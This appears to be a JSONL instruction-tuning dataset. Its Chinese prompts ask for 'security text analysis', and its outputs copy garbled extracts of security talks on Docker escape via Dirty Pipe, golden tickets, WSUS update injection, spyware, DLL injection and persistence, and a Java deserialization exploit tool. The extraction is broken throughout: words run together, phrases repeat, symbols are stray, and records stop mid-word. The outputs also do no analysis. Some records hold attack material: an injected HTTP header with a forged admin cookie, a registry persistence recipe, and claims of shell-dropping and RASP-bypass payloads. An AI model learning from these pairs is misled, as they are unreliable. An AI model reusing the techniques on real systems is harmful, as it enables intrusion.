www.DroneDeploy.com @glennzw 3. Payload @glennzw @glennzw D.T.F @glennzw @glennzw @glennzw @glennzw @glennzw @glennzw Its open source!  In progress:  GSM, iBeacon, SDR, ZigBee, ANT, NFC, RFID  Other ideas:  OpenCV, physical detection https://github.com/sensepost/snoopy-ng @glennzw 4. Methodology Vehicle Payload Autonomy Ground Control @glennzw Use Cases @glennzw Use Cases @glennzw Use Cases @glennzw Use Cases DeAuth DeAuth DeAuth @glennzw [Video Demo] @glennzw Snoopys friends... @glennzw Retail @glennzw Military @glennzw Text http://dronesurvivalguide.org @glennzw The good! @glennzw Site launch! http://www.sensepost.com/blog @glennzw #SnoopySensor @glennzw http://www.sensepost.com/blog @glennzw Mana From Heaven: Improving the state of wireless rogue AP attacks Saturday, 4pm, Penn & Teller @glennzw glenn@sensepost.com jobs@sensepost.com http://research.sensepost.com/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 从脏管道到 Docker 逃逸 --- <center><h1>从脏管道CVE-2022-0847到 Docker 逃逸</h1><b>本文作者happi0</b><br><br></center> --- ## 一利用条件与限制 ### 利用条件 * 有可读权限或者可以传回文件的文件描述符 * 有漏洞的内核 ### 利用的限制 * 第一个字节不可修改并且单次写入不能大于 4k * 只能单纯覆盖不能调整文件大小 * 由于漏洞基于内存页所以不会对磁盘有影响 ## 二与 Docker 的关系 由于 Docker 和宿主机是共享内核尽管与其他进程资源是隔离开的内核漏洞也很可能会对 Docker 容器造成安全问题 ### 对于容器的影响 由于 Docker 本质上是由一组互相重叠的层所组层的然后容器引擎将其合并到一起原本这些层都是只读的但由于脏管道漏洞的影响我们可以在 `u1` 容器里修改 `/etc/passwd` 使得 `u2` 容器的 `/etc/passwd` 被修改 <img width=\"1000\" src=\"/img/1674127870.png\"> ### 利用 CAP_DAC_READ_SEARCH 实现容器逃逸 通过利用 `CAP_DAC_READ_SEARCH` 与脏管道可以实现覆盖主机文件, 该攻击手段可以在 Github 看到详细过程地址 [github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape](https://github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape) 这里实际上主要是 `CAP_DAC_READ_SEARCH` 可以调用 `open_by_handle_at`, 从而获得主机文件的文件描述符再配合脏管道于是就可以修改主机文件了 <img width=\"800\" src=\"/img/1674127999.png\"><br> 这种攻击方式非常简单核心就是获得文件的文件描述符即可 ### 通过 runC 实现容器逃逸 一个容器开启时可以分为以下三步 * fork 创建子进程 * 初始化容器化环境 * 将执行流重定向到用户提供的入口点 对于第三步以大名鼎鼎的 `CVE-2019-5736` 为例当重定向入口点时容器内的`/proc/self/exec` 与主记的 `runc` 二进制文件相关联 因此可以通过在容器内写入该文件描述符实现容器逃逸 对于 `CVE-2019-5736` 的修复可以参见[github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b](https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b) <img width=\"800\" src=\"/img/1674128155.png\"><br> 由于篇幅原因这里不跟进 `CVE-2019-5736` 的修复的具体代码直接看 `git commit` 了解修复逻辑 可以看到修复逻辑是克隆 `/proc/self/exec` 避免容器内部直接获取 `runC`然而很快开发者修改了修复逻辑参见[github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628](https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628) <img width=\"800\" src=\"/img/1674128209.png\"><br> 可以看到开发者认为克隆导致的内存开销太大了可能造成 `OOM` 或者其他问题把修复逻辑改成了只读挂载 这里联想到上文总结的 `脏管道` 的利用条件和利用效果发现刚好契合 <img width=\"1000\" src=\"/img/1674128244.png\"><br> 这里的利用主要参考了这里的内容[securitylabs.datadoghq.com/articles/dirty-pipe-container-escape-poc/](https://securitylabs.datadoghq.com/articles/dirty-pipe-container-escape-poc/) 主机执行 `docker exec -it u1 /bin/sh` 后 `/usr/sb", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBio SecurityResearcher/Tester(HarrisCorp) FormerArmyRedTeamOperator OneofthedevelopersofPowerSploit Twitter:@obscuresec Blog:www.obscuresec.com Sayhellotokrbtgt Hesbeenheresincethebeginning TheEarlyYears:20012004 GrowingPains:20052008 MaturityRealized:20092012 MemeCount:1 SkeletonsintheCloset:20132014 MemeCount:2 http://blog.gentilkiwi.com/securite/mimikatz/goldenticketkerberos Howoldisyourkrbtgt hash? Knowwhereyourkrbtgt hashis? Thepointis Ifyourenterprisehaseverbeen compromised,itmaystillbecompromised evenifyouchangedeverypassword. Wescansowearesecure Goodluckwiththat MemeCount:3 SpoofedPACAttack GoldenTicketAttack https://twitter.com/gentilkiwi/status/415147415474167808 DemoTime Mitigation Dontgetownedagain UseRODCwhereappropriate Upgradefunctionallevel Resetthekrbtgt accountpasswordonthe PDCemulatorTWICE Detection Needleinahaystack HardertodetectthanPtH Lookforstrangeaccountactivity Lowprivilegedaccountperformingprivileged actions Thanks SkipDuckwall BenjaminDelpy JoeBialek WillPeteroy CarlosSpicyweiner MattGraeber Manyothers Questions?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWiddershins: The Hacker Nation Simple Nomad DefCon X - 2002 About Me/This Talk NMRC BindView Skills Needed NMRC BindView Skills Needed NMRC BindView Skills Needed The Year In Review DMCA muscle is flexed. Terrorism. Legislation clarifies various portions of previous laws. More knee-jerk legislation on the way. The Problem: Packeteering Satan's Network (Programming Satan's Computer - Ross Anderson and Roger Needham 1995) What Can Satan Sniff? During the question and answer session, an interesting discussion ensued. Here is a quote from conference attendee Viktor Mayer-Schoenberger: \"Both presenters explicitly acknowledged that a number of anonymous remailers in the US are run by government agencies scanning traffic. Marlow said that the government runs at least a dozen remailers and that the most popular remailers in France and Germany are run by the respective government agencies in these countries. In addition they mentioned that the NSA has successfully developed systems to break encrypted messages below 1000 bit of key length and strongly suggested to use at least 1024 bit keys. They said that they themselves use 1024 bit keys.\" \"Anonymous Re-mailers as Risk-Free International Infoterrorists\" presented by Paul Strassmann, National Defense University and William Marlow, Science Applications International Corporation. Presented at the \"Information, National Policies, and International Infrastructure\" conference at Harvard Law School, Cambridge, Massachusetts, January 30, 1996. http://www.strassmann.com/pubs/anon-remail.html http://ksgwww.harvard.edu/iip/GIIconf/gii2age.html http://catless.ncl.ac.uk/Risks/17.87.html#subj6 What Can Satan Sniff? \"Disclosing the method of attacking PGP would involve disclosing classified cryptographic analysis methods (I was taught by the government), and such a disclosure to uncleared persons would be seriously illegal (in wartime such a disclosure carries the death penalty). Seriously though, I would love to lay out the holes in seve", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Better Privacy Through Offense: How To Build a Privacy Red Team Scott Tenaglia Engineering Manager, Privacy Red Team, Meta #BHUSA @BlackHatEvents Information Classification: General Agenda 01 The Case for Offensive Privacy 02 Security and Privacy 03 Metas Privacy Red Team 04 Operations Ideas 05 Final Thoughts #BHUSA @BlackHatEvents Information Classification: General This talk is...  The start of a conversation about offensive privacy.  Potentially a blueprint for how your company could create a similar team or offering.  To help you understand how privacy red teaming fits into a holistic privacy program. This talk is not...  A product or service pitch.  A conversation about any other aspect of Meta beyond privacy red teaming.  About absolutes.  The final word on this topic. #BHUSA @BlackHatEvents Information Classification: General Agenda 01 The Case for Offensive Privacy 02 Security and Privacy 03 Metas Privacy Red Team 04 Operations Ideas 05 Final Thoughts #BHUSA @BlackHatEvents Information Classification: General Have you ever...  Been on an op, come across some PII, but dont know what to do about it?  Been asked to start recording access to user data as a finding?  Been asked to perform a more privacy-focused assessment?  Had a finding but no one cared because it have enough security impact? #BHUSA @BlackHatEvents Information Classification: General Security and Privacy programs help mitigate risk. Perceived Risk Mitigations Red Team *Image courtesy of the NIST Privacy Framework https://www.nist.gov/privacy-framework/privacy-framework Red teams identify actual risk by testing mitigations from an adversarial perspective. Mitigations are a combination of people, process, and technology (i.e., a blue team). #BHUSA @BlackHatEvents Information Classification: General Scraping Red Team Scanning Identify the actual risk to systems and networks. *Image courtesy of the NIST Privacy Framework https://www.nist.gov/privacy-framework/privacy-framework", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n公司介绍  宜信创立于2006年从事普惠金融和财富管理事业的金融科技企业在支付 网贷众筹机器人投顾智能保险区块链等前沿领域积极布局通过业务孵化和 产业投资参与全球金融科技创新  成立十二年以来始终坚持以理念创新模式创新和技术创新服务中国高成长性人群 大众富裕阶层和高净值人士真正的让金融更美好 宜人宜己美好生活 部门介绍  宜信安全部直属于宜信总公司承接总部及所有子公司的安全需求为公司的业务安全保驾护航 安全部成4年以来弥补了公司安全基础建设的缺失发展至今组建了覆盖网络应用主机终端 数据逐层渗透的前沿安全架构每一步都凝聚着肩负亿万用户信息和财产安全的责任  2018年我们在传统安全架构上引入了当前热点科技将人工智能与大数据技术融合到当前的安全架构 中将资产漏洞风控和管理有机结合到一起构建用户画像为实现安全态势感知与威胁情报预警 奠定了基础  自研的洞察漏洞管理平台在GitHub上进行了开源借此帮助更多金融科技的行业伙伴完成自动 化风险全生命周期的管理并实现风险的可量化共建互联网金融行业的安全生态  产品工具种类繁多学习和切换成本较高  人工使用工具获取资产数据和进行结果处理耗时耗力  安全工具功能单一且无法协同使用 安全产品学习和运维成本高 安全检测网络环境多样化  IDC多IDC ,办公网公网单一扫描节点无法满足复杂的需求 问题和痛点 疲于工具的学习和使用 乐于技能提高专注风险本身 解决思路 0x01 谈谈分布式 基于任务队列的分布式扫描 1. 难以将扫描功能解耦合 2. 分发后聚合实现比较繁琐 3. 扫描模块调用接口不统一 基于MapReduce模型分布式扫描 1. 易于任务数据分片和结果聚合 2. 调用链使用简单 3. P2P方式进行数据传输效率高 举个栗子  举例说明任务数据分片和任务链过程: 子域名扫描->端口扫描-> 弱口令扫描 域名1 域名2 域名n 域名 列表 子域名扫描 IP1 IP2 IPm 端口扫描 端口1 端口2 端口o 弱口令扫描 聚合 结果    异步执行 举个栗子  举例说明任务数据分片和任务链过程: 子域名扫描->端口扫描-> 弱口令扫描 域名1 域名2 域名n 域名 列表 子域名扫描 IP1 IP2 IPm 端口扫描 端口1 端口2 端口o 弱口令扫描 聚合 结果    异步执行 0x02 功能可扩展易于开发 插件开发  开发过程简化  将重复的工作抽象出来封装起来例如安全通信任务监控数据传输等 等  提供协程线程进程任务执行粒度支持  Python依赖自动检测并安装  结果保存为JSON方便后续使用 HelloWorld示例 任务状态 CRON表达式任务参数执行次 数执行花销时间优先级等信息 Blade扫描器与分布式平台 Agent Agent  Agent Blade Agent Scheduler 调 度 器 集 群 单 机 便于单机开发和测试 Blade扫描器-命令行模式 Blade扫描器-Web模式 插件易于分发  复用一键打成Zip包和Zip包导入  vs PoC 偏向于功能级别的插件 多种响应方式  平台响应  邮件响应  第三方即时通讯接口响应 平台响应 漏洞名称描述以及扫描和更新时 间 邮箱响应 任务运行时的异常 第三方即时通信响应 0x03 架构可扩展 分布式架构 Ngnix Flask APP Web MSG Consumer DB Flask APP Flask APP Flask APP Scheduler MQ - Redis Agent Agent  Agent 负载均衡 授权通信 超时重传 压缩与序列化 JSON/TCP ZMQ+IOLOOP 异步高并发 通 信 层 调 度 层 Web 层 Gunicorn 前后端分离 JWT认证和鉴权 Python原生实现定时任务 SQLite 集 群 架构扩展 Ngnix Scheduler Redis Cluster Broker Scheduler Scheduler Agent Agent Agent Agent Agent Agent Gunicorn Load Balancing Web Flask APP Flask APP DB Proxy Consumer Gunicorn Web Flask APP Flask APP Consumer Gunicorn Web Flask APP Flask APP Consumer DB Write DB Read DB Read 0x04 节点可扩展 节点简单部署  1. 一键安装 pip install blade.whl  2. 配置Scheduler Server地址并启动如 192.168.1.2:5559 支持配置文件方便使用自动化运维分发部署 如有环境依赖提", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# The Best of Times Category: Forensics, 150 Points ## Description > An obscure entity, known only as \"K9\" has contacted the agency. > > The message states that they have sniffed out a flag from right under our noses, and it is now up to you to find which integral part of our communication has been compromised and revoke its validity! A binary file was attached. ## Solution Let's check the binary file: ```console root@kali:/media/sf_CTFs/matrix/The_Best_of_Times# cat dump.bin | head 45 00 00 4a 31 0e 40 00 40 11 a9 bc c0 a8 ef 84 c0 a8 ef 02 45 00 00 5a af 89 00 00 80 11 2b 31 c0 a8 ef 02 c0 a8 ef 84 45 00 00 47 b0 9d 00 00 80 06 c9 66 34 23 dc 5c c0 a8 ef 84 45 00 00 28 aa 31 40 00 40 06 cf f1 c0 a8 ef 84 34 23 dc 5c 45 00 00 4b aa 32 40 00 40 06 cf cd c0 a8 ef 84 34 23 dc 5c 45 00 00 28 b0 9e 00 00 80 06 c9 84 34 23 dc 5c c0 a8 ef 84 45 00 00 4f 61 61 40 00 40 06 69 53 c0 a8 ef 84 ac d9 12 ee 45 00 00 28 b0 9f 00 00 80 06 1a 3c ac d9 12 ee c0 a8 ef 84 ``` It's an ASCII file containing what looks like a HEX dump. Let's convert it into a real binary file: ```console root@kali:/media/sf_CTFs/matrix/The_Best_of_Times# cat dump.bin | xxd -r -p > hexdump.bin root@kali:/media/sf_CTFs/matrix/The_Best_of_Times# xxd -g 1 hexdump.bin | head 00000000: 45 00 00 4a 31 0e 40 00 40 11 a9 bc c0 a8 ef 84 E..J1.@.@....... 00000010: c0 a8 ef 02 45 00 00 5a af 89 00 00 80 11 2b 31 ....E..Z......+1 00000020: c0 a8 ef 02 c0 a8 ef 84 45 00 00 47 b0 9d 00 00 ........E..G.... 00000030: 80 06 c9 66 34 23 dc 5c c0 a8 ef 84 45 00 00 28 ...f4#.\\....E..( 00000040: aa 31 40 00 40 06 cf f1 c0 a8 ef 84 34 23 dc 5c .1@.@.......4#.\\ 00000050: 45 00 00 4b aa 32 40 00 40 06 cf cd c0 a8 ef 84 E..K.2@.@....... 00000060: 34 23 dc 5c 45 00 00 28 b0 9e 00 00 80 06 c9 84 4#.\\E..(........ 00000070: 34 23 dc 5c c0 a8 ef 84 45 00 00 4f 61 61 40 00 4#.\\....E..Oaa@. 00000080: 40 06 69 53 c0 a8 ef 84 ac d9 12 ee 45 00 00 28 @.iS........E..( 00000090: b0 9f 00 00 80 06 1a 3c ac d9 12 ee c0 a8 ef 84 .......<.......", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWSUSpendu ANSSI Romain Coltel Romain.Coltel@Alsid.eu Yves Le Provost Yves.Le-Provost@ssi.gouv.fr 2 WSUSpendu Contents Introduction 5 WSUS and network architecture 7 1.1 Architectures presentation 7 1.2 Auto approved updates 10 1.3 State of the art - WSUSpect and technical limitations 11 WSUS internals 13 2.1 IIS Webservice 13 2.2 Database 15 2.3 WSUS service 15 Injecting a new update 17 3.1 Interaction with the database 17 3.2 Update metadata 17 3.3 Updates binary upload 20 3.4 Injecting in the database 21 3.5 Targeting a specific client 22 3.6 Update deployment 22 Introducing WSUSpendu 23 Auditing WSUS 25 Microsoft network architecture issues 27 6.1 Administration principles 27 6.2 One WSUS server for multiple forests 27 6.3 A WSUS server for a disconnected network 28 Recommendations 29 7.1 Securing the WSUS service itself 29 3 WSUSpendu 7.2 Multiple WSUS servers architectures 29 7.3 Disconnected networks case 30 Conclusion 31 Bibliography 33 4 WSUSpendu Introduction WSUS is a Microsoft service that deploys updates on the computer park depending on the organizations needs, which is essential for a secured infrastructure. Easy to use and to install, it is possible to adapt it according to the different patch policy of every organization. However, the services purpose is to install softwares (patches in that case) on a large number of operating systems. Thus it is easy to understand that a misuse of its legitimate functionality could be critical for the network security. Such a case has been presented by Paul Stone and Alex Chapman during Black Hat 2015 [3]. Their presentation resulted on the provision of a new tool named WSUSpect. This tool was created to exploit a MITM attack and to inject an additional and malicious update in the connection between client and server. However, an attacker will not always be able to use this tool, especially if network protections have been configured. In another case, an update server could be placed at the border of the network (t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nshift === 移动位置参数 ## 概要 ```shell shift [n] ``` ## 主要用途 - 将位置参数`$n, $n+1...`重命名为`$1, $2...` ## 参数 n可选大于等于1且小于等于参数个数的整数默认为1 ## 返回值 返回成功除非n大于参数个数或n小于1以及其他非法值 ## 例子 假设我们的脚本文件test.sh如下 ```shell #!/usr/bin/env bash # 显示前三个位置参数 echo \"$1 $2 $3\" # 移除前两个位置参数并将$3重命名为$1之后的以此类推 shift 2 echo \"$1 $2 $3\" ``` 在终端执行该脚本 ```shell sh test.sh q w e r t ``` 返回信息如下 ```shell q w e e r t ``` ### 注意 1. 该命令是bash内建命令相关的帮助信息请查看`help`命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON GIRLS Wargame 2014/12/07 Allen Own allenown@devco.re GET / HTTP/1.1 Host: devco.re User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:33.0) Gecko/ 20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-tw,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://devco.re/ Cookie: user=admin X-Forwarded-For: 127.0.0.1' Connection: keep-alive", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[ ysuserial ] 某动在即为助在线防守的伙伴特发此项帮助伙伴们更效更快速的针对 Java 反序列化漏洞进检及安全修复 本项为 ysoserial [su18] 专版取名为 ysuserial 在原项 ysoserial 基础上魔改来主要有以下新添加功能 1. 基础链版本的覆盖原版反序列化链可能仅限于某个版本本项添加了如 CB/C3P0 等链的低版本可键 getshell 的版本 覆盖更 2. 利链的扩充和丰富在原版基础上添加了多条利链扩展利式更够在依赖不确定利式有限制的情况扩展更多的攻击 路径 3. 利式的填充原版的利链的利式仅使了 Runtime 执系统命令本项添加了多种利式并持执定义任意 代码 4. 利链探测本项在 URLDNS 中添加了利链的探测在攻击中不再盲乱打先通过 DNSLOG 检测类名再执攻击 5. 内存本项在利时对于部分链持了键打 Spring/Tomcat 内存功能内存持命令执冰蝎哥斯拉三种利 式并持 Tomcat 回显命令执Neoreg 流量隧道内存 6. 防御绕过在部分系统中使了 WAF/RASP 等防御模式本项去除多数原版特征并在执恶意动作时使了多种能够绕过 RASP 的执式绕过防护 7. MSF/CS 上线配合远程 Jar 包键上线 MSF/CS 的功能集成体快步 项持利链展示 $ java -jar ysuserial-0.1-su18-all.jar _.-\"\"#....,,\"$ _\"$ \"$_ < >) | Y Su Serial ? | \\._ _./ ```\"$. . , ; .\"$''' | | | .-=\"& | \"'-. `-=#$%&%$\"(-' | ; :| _____.,-#%&$@%#&#~,._____ _____.,[ 暖熏得游醉 ],._____ _____.,[ 只把杭州作汴州 ],._____ [root\")~ A Mind-Blowing Tool Collected By [ su18@javaweb.org ] [root\")~ Shout Out to Yzmm / Shxjia / Y4er / N1nty / C0ny1 / Phith0n / Kezibei [root\")~ AND OF COURSE TO THE All MIGHTY @frohoff [root\")~ Usage: java -jar ysuserial-0.1-su18-all.jar [payload] '[command]' [root\")~ Available payload types: Jun 19, 2022 11:54:53 PM org.reflections.Reflections scan INFO: Reflections took 195 ms to scan 1 urls, producing 26 keys and 230 values Payload Authors Dependencies ------- ------- ------------ AspectJWeaver @Jang aspectjweaver:1.9.2, commons- collections:3.2.2 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons- java:0.2.11 C3P092 @mbechler c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8, mchange-commons-java:0.2.11 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 Clojure @JackOfMostTrades clojure:1.8.0 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 CommonsBeanutils1183NOCC commons-beanutils:1.8.3 CommonsBeanutils2 commons-beanutils:1.9.2 CommonsBeanutils2NOCC commons-beanutils:1.8.3, commons-logging:1.2 CommonsBeanutils3 commons-beanutils:1.9.2, commons-collections:3.1 CommonsBeanutils3183 common", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Evolution of The Evolution of Windows Spyware Techniques Windows Spyware Techniques Birdman Birdman birdman@chroot.org birdman@chroot.org birdman@xsolve.com birdman@xsolve.com ccbirdman@gmail.com ccbirdman@gmail.com HIT2005 HIT2005 22 The Evolution of Windows Spyware Techniques By Birdman, HIT2005 The Evolution of Windows Spyware Techniques By Birdman, HIT2005 Welcome ! Welcome ! Hello everyone, This is Hello everyone, This is Birdman Birdman.. WARNING WARNING -- Contents of this Contents of this presentation are for presentation are for **Educational Purposes Educational Purposes ONLY ONLY**.. It is strongly suggested It is strongly suggested that you do not use this that you do not use this knowledge for illegal knowledge for illegal purposes!........ purposes!........plz plz   2 33 The Evolution of Windows Spyware Techniques By Birdman, HIT2005 The Evolution of Windows Spyware Techniques By Birdman, HIT2005 Outline Outline 1. 1. What is Spyware? What is Spyware? 2. 2. The Techniques In The Past The Techniques In The Past 3. 3. The Spyware of Nowadays The Spyware of Nowadays 4. 4. Stealth Tricks Stealth Tricks 5. 5. Anti Anti--Spyware Techniques Spyware Techniques 6. 6. Conclusion Conclusion 44 The Evolution of Windows Spyware Techniques By Birdman, HIT2005 The Evolution of Windows Spyware Techniques By Birdman, HIT2005 1. What is Spyware? 1. What is Spyware? Too Many Fake Jargons !? Too Many Fake Jargons !? In many news papers, magazines or reports, you In many news papers, magazines or reports, you must have heard about the following terms: must have heard about the following terms: Joke, Logic Bomb, Trojan, Backdoor, Worm, Dropper, Germ, Intended, Malware, Riskware, Spyware, Adware, Ghostware, Keylogger, Rookit, Harmful Program. But What But Whats It !? s It !? Don Dont care about those dazed words !! Because it is very t care about those dazed words !! Because it is very difficult to make proper definitions, they are just difficult to make proper definit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGe#ng&Windows&to&Play&with&Itself5 A\"Hackers\"Guide\"to\"Windows\"API\"Abuse\" \" Brady\"Bloxham\" Founder/Principal\"Security\"Consultant\" @silentbreaksec\" hCp://www.silentbreaksecurity.com\" hCp://www.blacksquirrel.io\"\" Background5  Shorten\"the\"gap\"between\" penetraHon\"test\"and\"actual\"aCack\"  Few\"covert\"persistence\"tools\"  Reduce\"reliance\"on\"Metasploit\" Got&a&lot&to&cover5  DLL\"InjecHon\"  Persistence\"  Throwback\"  Lots\"of\"demos\"along\"the\"way\" DLL&Injec?on5  TradiHonal\"methods\"  CreateRemoteThread()\"  NtCreateThreadEx()\"  RtlCreateUserThread()\"  NtQueueApcThread\"()\"  Can\"blue\"screen\"certain\"OSes\"  Code\"Cave\"  Suspend\"process\"  Inject\"code\"  Change\"EIP\"to\"locaHon\"of\"injected\"code\"  Resume\"process\"  Difficult\"on\"x64\" AddMonitor()5  +\"  Injects\"into\"spoolsv.exe\"  Doesnt\"require\"matching\"\" architecture\"  Easy\"to\"use\"  \\\"  Dll\"must\"be\"on\"disk\"  Requires\"administrator\"privs\" Dll&Injec?on&Demo5 Persistence5  Lots\"of\"persistence\"in\"Windows\"  Service\"\"  Run\"keys\"  Schtasks\"  \"  And\"lots\"sHll\"to\"find\"  Lots\"of\"techniques\"  Process\"monitor\"  Hook\"LoadLibrary()\" Persistence5  1st\"Technique\"  Requires\"VMware\"Tools\"be\"installed\"  Just\"drop\"a\"dll\"to\"disk\"  c:\\windows\\system32\\wbem\\ntdsapi.dll\"  Note:\"Dll\"must\"export\"same\"funcHons\"as\"\" real\"ntdsapi.dll\"  2nd\"Technique\"  VMware\"patched\"in\"ESXi\"5.5\"  Requires\"VMware\"Tools\"be\"installed\"\"  Just\"drop\"a\"dll\"to\"disk\"  c:\\windows\\system32\\wbem\\tpgenlic.dll\"  c:\\windows\\system32\\wbem\\thinmon.dll\" Windows( Persistence5  3rd\"Technique\"  HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\\"  Create\"a\"new\"key\"\"  Create\"a\"new\"value\"named\"Driver\"with\"the\"dll\"name\"  Create\"as\"many\"as\"you\"like\" Persistence&Demo5 Windows&API&HTTP&Cheatsheet5  WinHTTP\"  Intended\"for\"services\"  Does\"not\"pull\"user\"proxy\"seings\"  Supports\"impersonaHon\"  WinINet\"  More\"robust\"in\"proxy\"environment\"\"  Variety\"of\"flags\"that\"enable/disable\"funcHonality\"automaHcally\"  Prompts\"user\"for\"password\"if\"authenHcaHon\"is\"required\"  Uses\"IE\"seings\" What&is&Throwback?5  C++\"HTTP/S\"beaconing\"backdoor\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMax Goncharov, Philippe Lin 2015/8/28-29 Your Lightbulb Is Not Hacking You  Observation from a Honeypot Backed by Real Devices 1 2 Hit-Point ねこあつめ $ whoami  Philippe Lin  Staff engineer, Trend Micro  (x) Maker (o) Cat Feeder 3 $ whoami  Max Goncharov  Senior Threat Researcher, Trend Micro  (x) Evil Russian Hacker (o) Ethnical Russian Hacker 4 IoT Devices  Surveillance System 5 IoT Devices  Smart Alarm 6 IoT Devices  Garage Door Controller 7 IoT Devices  Philips hue / WeMo Switch 8 IoT Devices  Door Lock 9 IoT Devices  Thermostat 10 IoT Devices  Wireless HiFi & SmartTV 11 IoT Devices  Game Console 12 IoT Devices  Wireless HDD 13 IoT Devices  Blu-ray Player 14 IoT Devices  IPCam 15 IoT Devices  Kitchenware 16 IoT Devices  Personal Health Devices 17 Yes, IoT is hot and omnipresent  18 Credit: IBM, iThome and SmartThings. 19 19 Credit: Apple Daily, Weird, net-core 20 Credit: Tom Sachs (2009) Methodology  Taipei from March 23 - July 23, 2015  Munich from April 22 - June 22  URL / credential randomly pushed on Shodan and Pastebin  Faked identity, Avatar  Facebook  Dyndns  Skype  private documents in WDCloud 21 Taipei Lab 22 Block Diagram  Taipei Lab 23 Raspberry Pi 2 114.34.182.36 (PPPoE / HiNet) 192.168.42.11 D-Link D-931L (80) 192.168.42.12 Philips Hue Bridge (80, UDP 1900) 192.168.43.52 LIFX WiFi Bulb (TCP/UDP 56700) 192.168.43.53 Wii U (X) 192.168.43.54 Google Glass (X) wlan0 eth1 eth0 Munich Lab 24 Block Diagram  Munich Lab 25 Banana Pi R1 192.168.186.47 iMAC PowerPC (22) 192.168.186.45 Samsung SmartTV UE32H6270 (DMZ) 192.168.43.50 Grundig LIFE P85024 (X) 192.168.43.46 Samsung SmartCam SNH-P6410BN (80) wlan0 eth1 192.168.186.21 AppleTV (5000, 7000, 62078) 192.168.186.18 WD My Cloud 2TB (22, 80, 443, Samba) Munich Lab: Fake D-Link DIR-655 26 http://tomknopf.homeip.net/ Why Backed by Real Devices?  Shodan knows  and so do hackers 27 Now, the lousy part ... 28 D-Link DCS-931L IPCAM  No more blank password. Set to 123456.  My D-Link cloud service  I failed to enable it. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe$env:PATH lessTraveledisFull ofEasyPrivilegeEscalationVulns Bio SecurityResearcher/Tester(HarrisCorp) FormerArmyRedTeamOperator OneofthedevelopersofPowerSploit Twitter:@obscuresec Blog:www.obscuresec.com Sucksalotlessnow Gettingevenbetter OneGet ChocolateyNuget PSGet Alloftheseutilitiesaregreatfor: Simplifying3rdpartypatching Researchingvulnerabilities CTFbuilders OneGet OneGet isanewwaytodiscoverandinstall softwarepackagesfromaroundtheweb. Itletsyouseamlesslyinstallanduninstall packagesfromoneormorerepositorieswitha singlePowerShellcommand. OneGet willshipwithPowerShellv5 PointedtoChocolateyRepobydefault https://github.com/OneGet/oneget ChocolateyNuget Packagemanagerandreposerverwithalmost 4milliondownloads Over30contributors Microsoftsupportedopensourceproject https://chocolatey.org/ PSGet SecurityReview Requestedtodoareview StartedwithoneVM Triedtoinstall1800chocolatey packages Welltheresyourfirstproblem SecurityReview(continued) Created25Windows7/8VMs Scriptedinstallationacrossthem Still2bluescreensafterrebooting ScriptedsubmittinghashestoVirusTotal 100newhashes 31packageswithdetections PrivilegeEscalation Usedtheopportunitytowriteanewtool lookedforcommonprivilegeescalationvulns %PATH%based Filepermissionbased Servicepermissionbased Dllpreloading FoundabunchandcouldtunewiththeVMs Disclosuresucks MostwereapplicationsthatIhadneverheardof RepositoryServers Mustbetrusted Chocolateyrepositoryisthemostpopular Allowscontributionsfromnondevelopers MustbeenabledinOneGet Thepackagemanagersinheritvulnerabilities fromthereposerver ChocolateyPackages The$env:PATH PSv3usesthePATH Soausercan Iseewhatyoudidthere Beforethefix DemoTime Thanks MattGraeber JoeBialek WillSchroeder WillPeteroy LeeHolmes Manyothers Questions?", "category": "text_analysis", "source": "security_papers"}
